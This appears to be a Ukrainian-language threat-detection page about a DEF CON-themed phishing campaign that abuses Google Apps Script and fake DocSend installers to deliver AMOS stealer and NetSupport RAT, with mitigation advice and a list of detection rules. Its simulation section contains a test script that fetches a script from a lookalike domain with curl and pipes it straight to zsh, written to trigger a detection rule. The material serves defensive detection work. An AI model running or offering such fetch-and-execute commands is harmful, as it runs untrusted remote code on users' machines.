Фішинг, тематизований DEF CON, зловживає Google Apps Script для доставки шкідливого ПЗ
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисники націлюються на відвідувачів конференцій з кібербезпеки, використовуючи соціальну інженерію в X, раніше Twitter, для розповсюдження шкідливого ПЗ через заражені документи Google Docs і шахрайські інсталятори DocSend. Кампанія доставляє AMOS infostealer користувачам macOS, а користувачів Windows вражає багатоступеневий завантажувач, що включає NetSupport RAT і імплант гаманця Ledger. Атака використовує бічні панелі Google Apps Script і підказки в стилі ClickFix для зниження підозр і запуску шкідливого коду.
Розслідування
Дослідники Huntress взаємодіяли з зловмисником, видавши себе за виконавчого директора CoinDesk, щоб спостерігати за повним ланцюгом атаки. Розслідування виявило складний багатоступеневий процес, що включає Google Apps Script, фальшиві інсталятори, підписані вкраденими сертифікатами, і локальний проксі TLS для перехоплення на Windows. Дослідники також виявили другий етап, що виконує JavaScript в пам’яті і розгортає підроблений центр сертифікації.
Пом’якшення
Користувачі повинні вважати підозрілими неочікувані запити на виконання команд терміналу, обходження Gatekeeper або встановлення ручних оновлень з бічних панелей документів. Організації повинні моніторити незвичайну активність Google Apps Script і несанкціоноване використання сертифікатів для підпису коду. Сильні контролі кінцевих точок та незалежна перевірка посилань на спільний доступ до документів можуть додатково знизити вразливість.
Реакція
Якщо виявлена шкідлива активність, уражена система повинна бути негайно ізольована, щоб зупинити ексфільтрацію даних або латеральний рух. Респондери повинні зберегти цифрові докази і розглянути можливість перевстановлення пристрою, при цьому ставлячись до локальних облікових даних і даних криптовалютного гаманця як до компрометованих. Активні сесії повинні бути анульовані, паролі змінені, і всі API ключі або секрети, збережені на системі, замінені.
Перебіг атаки
Ми ще оновлюємо цю частину.
Виявлення
Підозріле управління та контроль за незвичайним верхньорівневим доменом (TLD) запит DNS (через dns)
Спроба підозрілого виконання curl [MacOS] (через cmdline)
Можливе виконання з використанням короткого імені скрипта (через cmdline)
Викликай підозрілі методи .NET з Powershell (через powershell)
IOC (HashSha256) для виявлення: Post-DEF CON фішинг використовує Google Doc Apps Script для доставки шкідливого ПЗ
IOC (HashMd5) для виявлення: Post-DEF CON фішинг використовує Google Doc Apps Script для доставки шкідливого ПЗ
IOC (SourceIP) для виявлення: Post-DEF CON фішинг використовує Google Doc Apps Script для доставки шкідливого ПЗ
IOC (DestinationIP) для виявлення: Post-DEF CON фішинг використовує Google Doc Apps Script для доставки шкідливого ПЗ
Виявлення заражених DocSend і розгортання NetSupport RAT [створення процесу Windows]
Можливе виконання шкідливого шелл-скрипта на macOS [створення процесу Linux]
Виявлення шкідливого зв’язку і постачання завантажувального ПЗ [мережева з’єднання Windows]
Виявлення створення і виконання шкідливого PowerShell скрипта [Windows Powershell]
## Виконання симуляції
Перелімінарно: Перевірка телеметрії та базового налаштування перед полетом повинна пройти.
Обгрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати виявлені TTPs і намагатись створити ту саму телеметрію, яку очікує логіка виявлення. Абстрактні чи не пов’язані приклади можуть призвести до неправильної діагностики.
-
Сюжет атаки та команди: Противник прагне отримати початковий доступ до робочої станції macOS, маскуючись під законний процес оновлення API Google. Вони використовують тактику соціальної інженерії, де користувачеві наказують виконати команду в Терміналі. Команда використовує
curlдля отримання корисного навантаження зapple-googleapi.com(домен з помилковою буквою/схоже виглядає) і передає вивід напряму уzsh. Цей підхід “життя з землі” намагається мінімізувати судмедекспертизний слід на файловій системі, виконуючи код безпосередньо з мережевого потоку. -
Скрипт регресійного тесту:
#!/bin/bash # Симуляційний скрипт для запуску правила "Можливе виконання шкідливого шелл-скрипта". # Примітка: Ми використовуємо підроблену URL, що імітує структуру домену, щоб уникнути реальних зовнішніх викликів, якщо це потрібно, # але щоб правило спрацювало, команда має містити 'apple-googleapi.com'. echo "[*] Початок симуляції: Імітуємо шкідливий шелл-пайп..." # Ця команда задовольняє всі умови: # 1. Процес - zsh/sh/bash # 2. Містить 'curl' # 3. Містить '| zsh' # 4. Містить 'apple-googleapi.com' # Ми використовуємо неіснуючий URL, щоб уникнути фактичного виконання завантажуваного ПЗ, але все ще створюючи телеметрію. curl -s http://apple-googleapi.com/update.sh | zsh echo "[*] Симуляційна команда відправлена." -
Команди очищення:
# Жодних файлів не створюється на диску самою командою атаки, # але якщо були створені артефакти, їх потрібно видалити. rm -f ~/Downloads/update.sh 2>/dev/null echo "[*] Очищення завершено."